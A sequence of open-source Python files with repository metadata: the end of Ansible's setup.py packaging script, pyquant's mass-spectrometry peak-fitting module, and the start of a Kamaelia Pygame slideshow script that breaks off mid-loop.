""" crypto_backend = os.environ.get('ANSIBLE_CRYPTO_BACKEND', '').strip() if crypto_backend == PYCRYPTO_DIST: # Attempt to set version requirements return '%s >= 2.6' % PYCRYPTO_DIST return crypto_backend or None def substitute_crypto_to_req(req): """Replace crypto requirements if customized.""" crypto_backend = get_crypto_req() if crypto_backend is None: return req def is_not_crypto(r): CRYPTO_LIBS = PYCRYPTO_DIST, 'cryptography' return not any(r.lower().startswith(c) for c in CRYPTO_LIBS) return [r for r in req if is_not_crypto(r)] + [crypto_backend] def get_dynamic_setup_params(): """Add dynamically calculated setup params to static ones.""" return { # Retrieve the long description from the README 'long_description': read_file('README.rst'), 'install_requires': substitute_crypto_to_req( read_requirements('requirements.txt'), ), } here = os.path.abspath(os.path.dirname(__file__)) __version__, __author__ = find_package_info(here, 'lib', 'ansible', 'release.py') static_setup_params = dict( # Use the distutils SDist so that symlinks are not expanded # Use a custom Build for the same reason cmdclass={ 'build_py': BuildPyCommand, 'build_scripts': BuildScriptsCommand, 'install_lib': InstallLibCommand, 'install_scripts': InstallScriptsCommand, 'sdist': SDistCommand, }, name='ansible-base', version=__version__, description='Radically simple IT automation', author=__author__, author_email='info@ansible.com', url='https://ansible.com/', project_urls={ 'Bug Tracker': 'https://github.com/ansible/ansible/issues', 'CI: Shippable': 'https://app.shippable.com/github/ansible/ansible', 'Code of Conduct': 'https://docs.ansible.com/ansible/latest/community/code_of_conduct.html', 'Documentation': 'https://docs.ansible.com/ansible/', 'Mailing lists': 'https://docs.ansible.com/ansible/latest/community/communication.html#mailing-list-information', 'Source Code': 'https://github.com/ansible/ansible', }, license='GPLv3+', # Ansible will also make use of a system copy of python-six and # python-selectors2 if installed but use a Bundled copy if it's not. 
python_requires='>=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*', package_dir={'': 'lib', 'ansible_test': 'test/lib/ansible_test'}, packages=find_packages('lib') + find_packages('test/lib'), include_package_data=True, classifiers=[ 'Development Status :: 5 - Production/Stable', 'Environment :: Console', 'Intended Audience :: Developers', 'Intended Audience :: Information Technology', 'Intended Audience :: System Administrators', 'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)', 'Natural Language :: English', 'Operating System :: POSIX', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Topic :: System :: Installation/Setup', 'Topic :: System :: Systems Administration', 'Topic :: Utilities', ], scripts=[ 'bin/ansible', 'bin/ansible-playbook', 'bin/ansible-pull', 'bin/ansible-doc', 'bin/ansible-galaxy', 'bin/ansible-console', 'bin/ansible-connection', 'bin/ansible-vault', 'bin/ansible-config', 'bin/ansible-inventory', 'bin/ansible-test', ], data_files=[], # Installing as zip files would break due to references to __file__ zip_safe=False ) def main(): """Invoke installation process using setuptools.""" setup_params = dict(static_setup_params, **get_dynamic_setup_params()) ignore_warning_regex = ( r"Unknown distribution option: '(project_urls|python_requires)'" ) warnings.filterwarnings( 'ignore', message=ignore_warning_regex, category=UserWarning, module='distutils.dist', ) setup(**setup_params) warnings.resetwarnings() if __name__ == '__main__': main()
computersalat/ansible
setup.py
Python
gpl-3.0
15,054
[ "Galaxy" ]
9be703630a4118b97b012ebe6dcdce2abfe9a08a7b393f42d8292d6eabaccbaa
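The setup.py record above revolves around _find_symlinks, which walks a source tree and records only relative symlinks whose targets stay inside that tree. The following is a minimal, standalone sketch of that pattern using only the standard library; it is an illustration rather than part of the packaged setup.py, it omits the original's depth bookkeeping for '..' components and its JSON cache, and the 'lib' directory name is a placeholder.

import os
from collections import defaultdict

def find_relative_symlinks(topdir):
    # Map each symlink target to the relative paths that link to it.
    symlinks = defaultdict(list)
    for base_path, dirs, files in os.walk(topdir):
        for filename in files:
            filepath = os.path.join(base_path, filename)
            if not os.path.islink(filepath):
                continue
            target = os.readlink(filepath)
            if target.startswith('/'):
                # Absolute symlinks are not supported, mirroring the record.
                continue
            symlinks[target].append(os.path.relpath(filepath, topdir))
    return symlinks

if __name__ == '__main__':
    # 'lib' is a hypothetical directory; any checkout path works.
    print(dict(find_relative_symlinks('lib')))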
import sys from collections import defaultdict, OrderedDict from copy import deepcopy from operator import itemgetter, attrgetter import numpy as np from pythomics.proteomics.config import CARBON_NEUTRON from scipy import optimize from scipy.signal import convolve, kaiser from .cpeaks_wrapper import ( bigauss_func, gauss_func, bigauss_ndim, gauss_ndim, bigauss_jac, gauss_jac, find_nearest, find_nearest_index, get_ppm, ) # noqa: E402 from . import ( PEAK_FINDING_REL_MAX, PEAK_FIT_MODE_AVERAGE, PEAK_FIT_MODE_FAST, PEAK_FIT_MODE_SLOW, ) # noqa: E402 from .logger import logger # noqa: E402 from .utils import ( divide_peaks, find_possible_peaks, estimate_peak_parameters, interpolate_data, savgol_smooth, subtract_baseline, ) # noqa: E402 _epsilon = np.sqrt(np.finfo(float).eps) def findEnvelope( xdata, ydata, measured_mz=None, theo_mz=None, max_mz=None, precursor_ppm=5, isotope_ppm=2.5, isotope_ppms=None, charge=2, debug=False, isotope_offset=0, isotopologue_limit=-1, theo_dist=None, label=None, skip_isotopes=None, last_precursor=None, quant_method="integrate", reporter_mode=False, fragment_scan=False, centroid=False, contaminant_search=True, ): # returns the envelope of isotopic peaks as well as micro envelopes of each individual cluster spacing = CARBON_NEUTRON / float(charge) start_mz = ( measured_mz if isotope_offset == 0 else measured_mz + isotope_offset * CARBON_NEUTRON / float(charge) ) initial_mz = start_mz if max_mz is not None: max_mz = ( max_mz - spacing * 0.9 if isotope_offset == 0 else max_mz + isotope_offset * CARBON_NEUTRON * 0.9 / float(charge) ) if isotope_ppms is None: isotope_ppms = {} tolerance = isotope_ppms.get(0, precursor_ppm) / 1000000.0 env_dict, micro_dict, ppm_dict = OrderedDict(), OrderedDict(), OrderedDict() empty_dict = {"envelope": env_dict, "micro_envelopes": micro_dict, "ppms": ppm_dict} non_empty = xdata[ydata > 0] if len(non_empty) == 0: if debug: print("data is empty") return empty_dict first_mz = find_nearest(non_empty, start_mz) isotope_index = 0 use_theo = False # This is purposefully verbose to be more explicit if reporter_mode is False and fragment_scan is False: while get_ppm(start_mz, first_mz) > tolerance: # let's try using our theoretical mass first_mz = find_nearest(non_empty, theo_mz) if get_ppm(theo_mz, first_mz) > tolerance: # let's check our last boundary. 
This allows for drift in m/z values # as scans progress instead of enforcing the m/z at the first # observed instance of a given m/z if last_precursor is not None: first_mz = find_nearest(non_empty, last_precursor) if get_ppm(last_precursor, first_mz) > tolerance: # repeat all of that for the next isotopic index start_mz += spacing initial_mz += spacing theo_mz += spacing last_precursor += spacing isotope_index += 1 else: start_mz = last_precursor break else: start_mz += spacing theo_mz += spacing initial_mz += spacing isotope_index += 1 else: use_theo = True break tolerance = isotope_ppms.get(isotope_index, isotope_ppm) / 1000000.0 if isotope_index == 2 or (max_mz is not None and first_mz >= max_mz): if debug: print("unable to find start ion") return empty_dict precursor_tolerance = tolerance isotope_index += isotope_offset start_index = find_nearest_index(xdata, first_mz) start_info = findMicro( xdata, ydata, start_index, ppm=tolerance, start_mz=start_mz, calc_start_mz=theo_mz, quant_method=quant_method, reporter_mode=reporter_mode, fragment_scan=fragment_scan, centroid=centroid, ) start_error = start_info["error"] if "params" in start_info: if fragment_scan is False and start_info["error"] > tolerance: start = ( last_precursor if last_precursor is not None else theo_mz if use_theo else start_mz ) else: start = start_info["params"][1] else: if debug: print("empty start info", start_info) return empty_dict valid_locations2 = OrderedDict() valid_locations2[isotope_index] = [(0, start, find_nearest_index(non_empty, start))] contaminant_int = 0.0 if not reporter_mode and ( isotopologue_limit == -1 or len(valid_locations2) < isotopologue_limit ): isotope_index += 1 pos = find_nearest_index(non_empty, start) + 1 offset = isotope_index * spacing df_len = non_empty.shape[0] last_displacement = None valid_locations = [] # check for contaminant at doubly and triply charged positions to see if we're in another ion's peak if contaminant_search: for i in range(2, 4): closest_contaminant = find_nearest( non_empty, start - CARBON_NEUTRON / float(i) ) closest_contaminant_index = find_nearest_index( xdata, closest_contaminant ) contaminant_bounds = findMicro( xdata, ydata, closest_contaminant_index, ppm=precursor_tolerance, calc_start_mz=start, start_mz=start, isotope=-1, spacing=CARBON_NEUTRON / float(i), quant_method=quant_method, centroid=centroid, ) if contaminant_bounds.get("int", 0) > contaminant_int: contaminant_int = contaminant_bounds.get("int", 0.0) # set the tolerance for isotopes tolerance = isotope_ppms.get(isotope_index, isotope_ppm) / 1000000.0 while pos < df_len: # search for the ppm error until it rises again; we select the minima, and if this minima is # outside our ppm error, we stop the expansion of our isotopic cluster current_loc = non_empty[pos] if max_mz is not None and current_loc >= max_mz: if not valid_locations: break displacement = ( last_displacement + tolerance if last_displacement is not None else tolerance * 2 ) else: displacement = get_ppm(start + offset, current_loc) # because the peak location may be between two readings, we use a very tolerant search here and enforce the ppm at the peak fitting stage.
if displacement < tolerance * 5: valid_locations.append((displacement, current_loc, pos)) if last_displacement is not None: if valid_locations and displacement > last_displacement: # pick the peak closest to our error tolerance valid_locations2[isotope_index] = valid_locations isotope_index += 1 tolerance = isotope_ppms.get(isotope_index, isotope_ppm) / 1000000.0 offset = spacing * isotope_index displacement = get_ppm(start + offset, current_loc) valid_locations = [] if isotopologue_limit != -1 and ( len(valid_locations2) >= isotopologue_limit ): break elif displacement > last_displacement and not valid_locations: break last_displacement = displacement pos += 1 # combine any overlapping micro envelopes valid_keys = sorted( set(valid_locations2.keys()).intersection( theo_dist.keys() if theo_dist is not None else valid_locations2.keys() ) ) best_locations = [ sorted(valid_locations2[i], key=itemgetter(0))[0] for i in valid_keys ] for index, isotope_index in enumerate(valid_keys): if skip_isotopes is not None and isotope_index in skip_isotopes: continue _, _, empty_index = best_locations[index] micro_index = find_nearest_index(xdata, non_empty[empty_index]) if ydata[micro_index] == 0: micro_index += 1 if ydata[micro_index] == 0: micro_index -= 2 # if micro_index == 0: # pass isotope_tolerance = isotope_ppms.get(isotope_index, isotope_ppm) / 1000000.0 micro_bounds = findMicro( xdata, ydata, micro_index, ppm=precursor_tolerance if isotope_index == 0 else isotope_tolerance, calc_start_mz=start, start_mz=start_mz, isotope=isotope_index, spacing=spacing, quant_method=quant_method, centroid=centroid, ) if isotope_index == 0: micro_bounds["error"] = start_error micro_dict[isotope_index] = micro_bounds env_dict[isotope_index] = micro_index ppm_dict[isotope_index] = micro_bounds.get("error") # in all cases, the envelope is going to be either monotonically decreasing, or a parabola (-x^2) isotope_pattern = [ (isotope_index, isotope_dict["int"]) for isotope_index, isotope_dict in micro_dict.items() ] # Empirically, it's been found that enforcing the theoretical distribution on a per ms1 scan basis leads to # significant increases in variance for the XIC, so don't do it here if contaminant_int > 1: for i, (isotope_index, isotope_intensity) in enumerate(isotope_pattern): if contaminant_int > isotope_intensity: if debug: print("contaminant loss", label) env_dict.pop(isotope_index) micro_dict.pop(isotope_index) ppm_dict.pop(isotope_index) # rebuild the pattern after contaminants are removed isotope_pattern = [ (isotope_index, isotope_dict["int"]) for isotope_index, isotope_dict in micro_dict.items() ] if theo_dist is None: # are we monotonically decreasing? remove = False if len(isotope_pattern) > 2: # check if the 2nd isotope is smaller than the first. This is a classical case looking like: # # | # | | # | | | # | | | | if isotope_pattern[1][1] < isotope_pattern[0][1]: # we are, check this trend holds and remove isotopes it fails for for i, j in zip(isotope_pattern, isotope_pattern[1:]): if j[1] * 0.9 > i[1]: # the pattern broke, remove isotopes beyond this point remove = True if remove: if debug: print("pattern2.1 loss", label, j[0], isotope_pattern) env_dict.pop(j[0]) micro_dict.pop(j[0]) ppm_dict.pop(j[0]) # check if the 2nd isotope is larger than the first. 
This is a case looking like: # # # | | # | | # | | | | elif isotope_pattern[1][1] > isotope_pattern[0][1]: shift = False for i, j in zip(isotope_pattern, isotope_pattern[1:]): if shift and j[1] * 0.9 > i[1]: remove = True elif shift is False and j[1] < i[1] * 0.9: if shift: remove = True else: shift = True if remove: if debug: print("pattern2.2 loss", label, j[0], isotope_pattern) env_dict.pop(j[0]) micro_dict.pop(j[0]) ppm_dict.pop(j[0]) return { "envelope": env_dict, "micro_envelopes": micro_dict, "ppms": ppm_dict, } def findAllPeaks( xdata, ydata_original, min_dist=0, method=None, local_filter_size=0, filter=False, peak_boost=False, bigauss_fit=False, rt_peak=None, mrm=False, max_peaks=4, debug=False, peak_width_start=3, snr=0, zscore=0, amplitude_filter=0, peak_width_end=4, fit_baseline=False, rescale=True, fit_negative=False, percentile_filter=0, micro=False, method_opts=None, smooth=False, r2_cutoff=None, peak_find_method=PEAK_FINDING_REL_MAX, min_slope=None, min_peak_side_width=3, gap_interpolation=0, min_peak_width=None, min_peak_increase=None, chunk_factor=0.1, fit_mode=PEAK_FIT_MODE_AVERAGE, baseline_subtraction=False, **kwargs ): # Deprecation things if "baseline_correction" in kwargs: fit_baseline = kwargs["baseline_correction"] if micro: fit_baseline = False if not micro and gap_interpolation: ydata_original = interpolate_data( xdata, ydata_original, gap_limit=gap_interpolation ) rel_peak_constraint = 0.0 if fit_baseline else 0.5 original_max = ( np.abs(ydata_original).max() if fit_negative else ydata_original.max() ) amplitude_filter /= original_max ydata = ydata_original / original_max ydata_peaks = np.copy(ydata) if baseline_subtraction: ydata_peaks = subtract_baseline(ydata_peaks) if smooth and len(ydata) > 5: ydata_peaks = savgol_smooth(ydata_peaks) if filter or peak_boost: if len(ydata) >= 5: ydata_peaks = convolve(ydata_peaks, kaiser(10, 12), mode="same") ydata_peaks[np.isnan(ydata_peaks)] = 0 ydata_peaks /= np.abs(ydata_peaks).max() if fit_negative else ydata_peaks.max() final_peaks = find_possible_peaks( xdata, ydata, ydata_peaks, peak_find_method=peak_find_method, peak_width_start=peak_width_start, peak_width_end=peak_width_end, snr=snr, zscore=zscore, rt_peak=rt_peak, amplitude_filter=amplitude_filter, fit_negative=fit_negative, percentile_filter=percentile_filter, local_filter_size=local_filter_size, micro=micro, min_slope=min_slope, min_dist=min_dist, min_peak_side_width=min_peak_side_width, min_peak_width=min_peak_width, smooth=smooth, min_peak_increase=min_peak_increase, ) # Next, for fitting multiple peaks, we want to divide up the space so we are not fitting peaks that # have no chance of actually impacting one another. 
CHUNK_MAP = { PEAK_FIT_MODE_SLOW: 0.1, PEAK_FIT_MODE_AVERAGE: 0.5, PEAK_FIT_MODE_FAST: 1.0, } chunks = divide_peaks( np.abs(ydata_peaks), min_sep=5 if 5 > peak_width_end else peak_width_end, chunk_factor=CHUNK_MAP[fit_mode], ) if not chunks.any() or chunks[-1] != len(ydata_peaks): chunks = np.hstack((chunks, len(ydata_peaks))) logger.debug("found: {}\n".format(final_peaks)) step_size = 4 if bigauss_fit else 3 if fit_baseline: step_size += 2 min_spacing = min(np.diff(xdata)) / 2 peak_range = xdata[-1] - xdata[0] # initial bound setup initial_bounds = [(-1.01, 1.01), (xdata[0], xdata[-1]), (min_spacing, peak_range)] if bigauss_fit: initial_bounds.extend([(min_spacing, peak_range)]) if fit_baseline: initial_bounds.extend([(None, None), (None, None)]) # print(final_peaks) if debug: sys.stderr.write("final peaks: {}\n".format(final_peaks)) fitted_segments = defaultdict(list) for peak_width, peak_info in final_peaks.items(): row_peaks = peak_info["peaks"] if not row_peaks.any(): continue minima_array = np.array(peak_info["minima"], dtype=np.long) # Now that we have estimated the parameters for fitting all the data, we divide it up into # chunks and fit each segment. The choice to fit all parameters first is to prevent cases # where a chunk is dividing two overlapping points and the variance estimate may be too low. for chunk_index, right_break_point in enumerate(chunks): left_break_point = chunks[chunk_index - 1] if chunk_index != 0 else 0 segment_x = xdata[left_break_point:right_break_point] segment_y = deepcopy(ydata[left_break_point:right_break_point]) if not segment_y.any(): continue if not micro: segment_max = np.abs(segment_y).max() segment_y /= segment_max segment_row_peaks = [] segment_minima_array = [] for i in row_peaks: if i >= left_break_point: if i < right_break_point: segment_row_peaks.append(i - left_break_point) else: break for i in minima_array: if i >= left_break_point: if i < right_break_point: segment_minima_array.append(i - left_break_point) else: break if not segment_row_peaks: continue # Get peak parameter estimates and boundaries for this segment segment_guess, segment_bounds = estimate_peak_parameters( segment_x, segment_y, np.array(segment_row_peaks), np.array(segment_minima_array), fit_negative=fit_negative, rel_peak_constraint=rel_peak_constraint, micro=micro, bigauss_fit=bigauss_fit, fit_baseline=fit_baseline, ) if not segment_guess: continue args = (segment_x, segment_y, fit_baseline) opts = method_opts or {"maxiter": 1000} # Because the amplitude of peaks can vary wildly, we have to make sure our tolerance matters for the # smallest peaks. i.e. 
if we are fitting two peaks, one with an amplitude of 20M and another with 10000, # changes in the smaller peak will be below our tolerance and the minimization routine can ignore them if "ftol" not in opts and not micro: min_tol = 1e-10 for i, j in zip(segment_bounds, segment_guess): abs_i = np.abs(i[0]) if i[0] else None abs_j = np.abs(j) if j else None if abs_i and abs_i < min_tol: min_tol = abs_i / 5.0 if abs_j and abs_j < min_tol: min_tol = abs_j / 5.0 opts["ftol"] = min_tol fit_func = bigauss_func if bigauss_fit else gauss_func routines = ["SLSQP", "TNC", "L-BFGS-B"] if method: routines = [method] routine = routines.pop(0) if len(segment_bounds) == 0: segment_bounds = deepcopy(initial_bounds) # Check that the bounds for the mean are within the segment so the optimizer doesn't try and cheat # by going to solutions outside of the data if not micro: for i in range(1, len(segment_bounds), step_size): if segment_bounds[i][0] < segment_x[0]: segment_bounds[i] = (segment_x[0], segment_bounds[i][1]) if segment_bounds[i][1] > segment_x[-1]: segment_bounds[i] = (segment_bounds[i][0], segment_x[-1]) if fit_baseline: jacobian = None else: jacobian = bigauss_jac if bigauss_fit else gauss_jac if debug: print( "left and right segments", xdata[left_break_point], xdata[right_break_point - 1], ) print("guess and bnds", segment_guess, segment_bounds) hessian = None # if bigauss_fit else gauss_hess results = [ optimize.minimize( fit_func, segment_guess, args, method=routine, bounds=segment_bounds, options=opts, jac=jacobian, hess=hessian, tol=1e-3, ) ] while not results[-1].success and routines: routine = routines.pop(0) results.append( optimize.minimize( fit_func, segment_guess, args, method=routine, bounds=segment_bounds, options=opts, jac=jacobian, ) ) if results[-1].success: res = results[-1] else: res = sorted(results, key=attrgetter("fun"))[0] n = len(segment_x) k = len(res.x) bic = n * np.log(res.fun / n) + k * np.log(n) res.bic = bic for index, value in enumerate(res.x[2::step_size]): if value < min_spacing: res.x[2 + index * step_size] = min_spacing if bigauss_fit: for index, value in enumerate(res.x[3::step_size]): if value < min_spacing: res.x[3 + index * step_size] = min_spacing # does this data contain our rt peak? 
res._contains_rt = False if rt_peak != 0: for i in range(1, res.x.size, step_size): mean = res.x[i] lstd = res.x[i + 1] if bigauss_fit: rstd = res.x[i + 2] else: rstd = lstd if ( rt_peak is not None and mean - lstd * 2 < rt_peak < mean + rstd * 2 ): res._contains_rt = True if not micro: # Rescale our data back # Amplitude res.x[::step_size] *= segment_max if fit_baseline: # Slope res.x[step_size - 2 :: step_size] *= segment_max # Intercept res.x[step_size - 1 :: step_size] *= segment_max # TODO: Evaluate the F-test based method # if best_res: # cmodel_ssq = best_res.fun # new_model_ssq = res.fun # df = len(xdata)-len(res.x) # f_ratio = (cmodel_ssq-new_model_ssq)/(new_model_ssq/df) # res.p = 1-stats.f.cdf(f_ratio, 1, df) # bic = res.p # # if not best_res or res.p < best_res.p: # best_res = res # best_fit = np.copy(res.x) # best_rss = res.fun fitted_segments[(peak_width, chunk_index)].append((bic, res)) # Figure out the best set of fits segment_order = sorted(fitted_segments.keys(), key=itemgetter(0, 1)) best_fits = { peak_width: {"fit": [], "residual": 0,} for (peak_width, chunk_index) in segment_order } for key in segment_order: peak_width = key[0] fits = fitted_segments[key] lowest_bic = np.inf best_segment_res = 0 best_segment_fit = None for bic, res in fits: if bic < lowest_bic or ( getattr(best_segment_res, "_contains_rt", False) is not True and res._contains_rt is True ): if debug: sys.stderr.write("{} < {}\n".format(bic, lowest_bic)) if ( res._contains_rt is False and best_segment_res != 0 and best_segment_res._contains_rt is True ): continue if debug: print("NEW BEST!", res, "old was", best_segment_res) best_segment_fit = np.copy(res.x) best_segment_res = res lowest_bic = bic if debug: sys.stderr.write("{} - best: {}\n".format(res, best_segment_fit)) else: if best_segment_fit is None: return np.array([]), np.inf best_fits[peak_width]["fit"] += best_segment_fit.tolist() best_fits[peak_width]["residual"] += lowest_bic best_fits[peak_width][ "contains_rt" ] = not best_segment_res._contains_rt # this is so it sorts lower best_fit = sorted( ( ( best_fits[key[0]]["contains_rt"], best_fits[key[0]]["residual"], best_fits[key[0]]["fit"], ) for key in segment_order ), key=itemgetter(0, 1), ) if not best_fit: return (np.array([]), np.inf) best_fit = np.array(best_fit[0][2]) # If the user only wants a certain number of peaks, enforce that now if max_peaks != -1: # pick the top n peaks for max_peaks if rt_peak: means = best_fit[1::step_size] # If the user specified a retention time as a guide, select the n peaks closest peak_indices = np.argsort(np.abs(means - rt_peak))[:max_peaks] else: # Return the top n highest peaks amplitudes = best_fit[0::step_size] peak_indices = sorted(np.argsort(amplitudes)[::-1][:max_peaks]) best_fit = np.hstack( [best_fit[i * step_size : (i + 1) * step_size] for i in peak_indices] ) peak_func = bigauss_ndim if bigauss_fit else gauss_ndim # Get rid of peaks with low r^2 if not micro and r2_cutoff is not None: final_fit = np.array([]) for peak_index in range(0, len(best_fit), step_size): peak_info = best_fit[peak_index : peak_index + step_size] amplitude, mean, std = peak_info[:3] left = mean - 2 * std right = mean + 2 * peak_info[3] if bigauss_fit else mean + 2 * std # Establish a goodness of fit using the coefficient of determination (the r^2) value for each peak. # Because the input data can have multiple peaks, we calculate a r^2 that considers the variance around this peak. 
curve_indices = (xdata >= left) & (xdata <= right) fitted_data = ydata[curve_indices] fitted_x = xdata[curve_indices] for other_peak_index in range(0, len(best_fit), step_size): if other_peak_index == peak_index: continue fitted_data -= peak_func( fitted_x, best_fit[other_peak_index : other_peak_index + step_size] ) ss_tot = np.sum((fitted_data - np.mean(fitted_data)) ** 2) explained_data = peak_func(fitted_x, peak_info) if fit_baseline: explained_data += fitted_x * peak_info[-2] + peak_info[-1] ss_res = np.sum((fitted_data - explained_data) ** 2) coeff_det = 1 - (ss_res / ss_tot) if coeff_det >= r2_cutoff: final_fit = np.hstack((final_fit, peak_info)) best_fit = final_fit residual = sum((ydata - peak_func(xdata, best_fit)) ** 2) if rescale: # and not fit_baseline: best_fit[::step_size] *= original_max if fit_baseline: # Slope best_fit[step_size - 2 :: step_size] *= original_max # Intercept best_fit[step_size - 1 :: step_size] *= original_max return best_fit, residual def findMicro( xdata, ydata, pos, ppm=None, start_mz=None, calc_start_mz=None, isotope=0, spacing=0, quant_method="integrate", fragment_scan=False, centroid=False, reporter_mode=False, ): """ We want to find the boundaries of our isotopic clusters. Basically we search until our gradient changes, this assumes it's roughly gaussian and there is little interference """ # find the edges within our tolerance tolerance = ppm offset = spacing * isotope df_empty_index = xdata[ydata == 0] if start_mz is None: start_mz = xdata[pos] fit = True if centroid: int_val = ydata[pos] left, right = pos - 1, pos + 1 error = get_ppm(start_mz + offset, xdata[pos]) fit = np.abs(error) < tolerance peak = [int_val, xdata[pos], 0] else: if df_empty_index.size == 0 or not ( df_empty_index[0] < xdata[pos] < df_empty_index[-1] ): left = 0 right = xdata.size else: right = np.searchsorted(df_empty_index, xdata[pos]) left = right - 1 left, right = ( np.searchsorted(xdata, df_empty_index[left], side="left"), np.searchsorted(xdata, df_empty_index[right]), ) right += 1 new_x = xdata[left:right] new_y = ydata[left:right] if new_y.sum() == new_y.max(): peak_mean = new_x[np.where(new_y > 0)][0] peaks = (new_y.max(), peak_mean, 0) sorted_peaks = [(peaks, get_ppm(start_mz + offset, peak_mean))] else: peaks, peak_residuals = findAllPeaks( new_x, new_y, min_dist=(new_x[1] - new_x[0]) * 2.0, peak_width_start=1, micro=True, ) sorted_peaks = sorted( [ (peaks[i * 3 : (i + 1) * 3], get_ppm(start_mz + offset, v)) for i, v in enumerate(peaks[1::3]) ], key=itemgetter(1), ) if (fragment_scan is False or reporter_mode) and not within_tolerance( sorted_peaks, tolerance ): if calc_start_mz is not None: sorted_peaks2 = sorted( [ (peaks[i * 3 : (i + 1) * 3], get_ppm(calc_start_mz + offset, v)) for i, v in enumerate(peaks[1::3]) ], key=itemgetter(1), ) if any(filter(lambda x: x[1] < tolerance, sorted_peaks2)): sorted_peaks = sorted_peaks2 else: fit = False else: fit = False peak = np.array(sorted_peaks[0][0]) # only go ahead with fitting if we have a stdev. 
Otherwise, set this to 0 if peak[2] > 0: # peak[0] *= new_y.max() int_val = gauss_ndim(new_x, peak).sum() else: int_val = 0.0 if not fit: pass error = sorted_peaks[0][1] ret_dict = { "int": int_val if fit or (fragment_scan is True and not reporter_mode) else 0.0, "int2": int_val, "bounds": (left, right), "params": peak, "error": error, } return ret_dict def within_tolerance(arr, tolerance): # arr is a list of tuples with the [1] index for each tuple being the ppm error for i in arr: if i[1] < tolerance: return 1 return 0 def targeted_search( merged_x, merged_y, x_value, attempts=4, max_peak_distance=1.0, peak_finding_kwargs=None, ): rt_attempts = 0 fitting_y = np.copy(merged_y) find_peaks_kwargs = { "filter": False, "bigauss_fit": True, "rt_peak": x_value, } peak_finding_kwargs = peak_finding_kwargs or {} if peak_finding_kwargs: assert isinstance( peak_finding_kwargs, dict ), "peak_finding_kwargs must be a dictionary" find_peaks_kwargs.update(peak_finding_kwargs) debug = peak_finding_kwargs.get("debug") found_rt = False stepsize = 3 if find_peaks_kwargs.get("bigauss_fit"): stepsize += 1 if find_peaks_kwargs.get("fit_baseline"): stepsize += 2 while rt_attempts < attempts and not found_rt: logger.debug("MERGED PEAK FINDING ATTEMPT %s", rt_attempts) res, residual = findAllPeaks(merged_x, fitting_y, **find_peaks_kwargs) if not res.any(): return (None, np.inf) rt_peak = bigauss_ndim(np.array([x_value]), res)[0] # we don't do this routine for cases where there are > 5 found_rt = sum(fitting_y > 0) <= 5 or rt_peak > 0.05 if not found_rt and rt_peak < 0.05: # get the closest peak nearest_peak = sorted( [(i, np.abs(x_value - i)) for i in res[1::stepsize]], key=itemgetter(1) )[0][0] # this is tailored to mass spectrometry elution profiles at the moment, and only evaluates for situations where the rt and peak # are no further than a minute apart. if np.abs(nearest_peak - x_value) < max_peak_distance: rt_index = find_nearest_index(merged_x, x_value) peak_index = find_nearest_index(merged_x, nearest_peak) if rt_index < 0: rt_index = 0 if peak_index == -1: peak_index = len(fitting_y) if rt_index != peak_index: grad_len = np.abs(peak_index - rt_index) if grad_len < 4: found_rt = True else: gradient = ( (np.gradient(fitting_y[rt_index:peak_index]) > 0) if rt_index < peak_index else (np.gradient(fitting_y[peak_index:rt_index]) < 0) ) if sum(gradient) >= grad_len - 1: found_rt = True else: found_rt = True if not found_rt: if debug: print("cannot find rt for", x_value) print(merged_x, fitting_y, res, sum(fitting_y > 0)) fitting_y -= bigauss_ndim(merged_x, res) fitting_y[fitting_y < 0] = 0 rt_attempts += 1 return (res, residual) if found_rt else (None, np.inf)
Chris7/pyquant
pyquant/peaks.py
Python
mit
35,651
[ "Gaussian" ]
daedcae349be75eed27398153aeb989e6f333c45094916fffa1ba568f000a08d
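The findAllPeaks routine in the record above boils down to expressing each peak as (amplitude, mean, width) parameters and minimizing the sum of squared residuals with scipy.optimize.minimize, trying SLSQP first. Below is a small self-contained sketch of that core idea for a single Gaussian; it is not part of the record, gauss() is a plain-Python stand-in for pyquant's compiled gauss_ndim, and the data are synthetic.

import numpy as np
from scipy import optimize

def gauss(x, amp, mean, std):
    # Single Gaussian evaluated over x.
    return amp * np.exp(-((x - mean) ** 2) / (2 * std ** 2))

def sum_sq_residuals(params, x, y):
    # Objective: sum of squared differences between model and data.
    return np.sum((y - gauss(x, *params)) ** 2)

x = np.linspace(0, 10, 101)
rng = np.random.default_rng(0)
y = gauss(x, 2.0, 5.0, 0.8) + rng.normal(scale=0.05, size=x.size)

# Seed the optimizer from the data, much as estimate_peak_parameters does above.
guess = [y.max(), x[np.argmax(y)], 1.0]
bounds = [(0, None), (x[0], x[-1]), (1e-6, x[-1] - x[0])]
res = optimize.minimize(sum_sq_residuals, guess, args=(x, y),
                        method='SLSQP', bounds=bounds)
print(res.x)  # fitted amplitude, mean and standard deviation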
#!/usr/bin/python # -*- coding: utf-8 -*- # # Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1) # # (1) Kamaelia Contributors are listed in the AUTHORS file and at # http://www.kamaelia.org/AUTHORS - please extend this file, # not this notice. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ------------------------------------------------------------------------- # import os import time import Axon from Kamaelia.Chassis.Pipeline import Pipeline from Kamaelia.Chassis.PAR import PAR from Kamaelia.Codec.Dirac import DiracDecoder from Kamaelia.File.ReadFileAdaptor import ReadFileAdaptor from Kamaelia.UI.Pygame.Button import Button from Kamaelia.UI.Pygame.Image import Image from Kamaelia.UI.Pygame.Ticker import Ticker from Kamaelia.UI.Pygame.Text import TextDisplayer, Textbox from Kamaelia.UI.Pygame.VideoOverlay import VideoOverlay from Kamaelia.UI.Pygame.VideoSurface import VideoSurface from Kamaelia.Util.Chooser import Chooser from Kamaelia.Util.RateFilter import MessageRateLimit from Kamaelia.Video.PixFormatConversion import ToRGB_interleaved class timedShutdown(Axon.ThreadedComponent.threadedcomponent): TTL = 1 def main(self): time.sleep(self.TTL) self.send(Axon.Ipc.shutdownMicroprocess(), "signal") path = "Slides" extn = ".gif" allfiles = os.listdir(path) files = list() for fname in allfiles: if fname[-len(extn):]==extn: 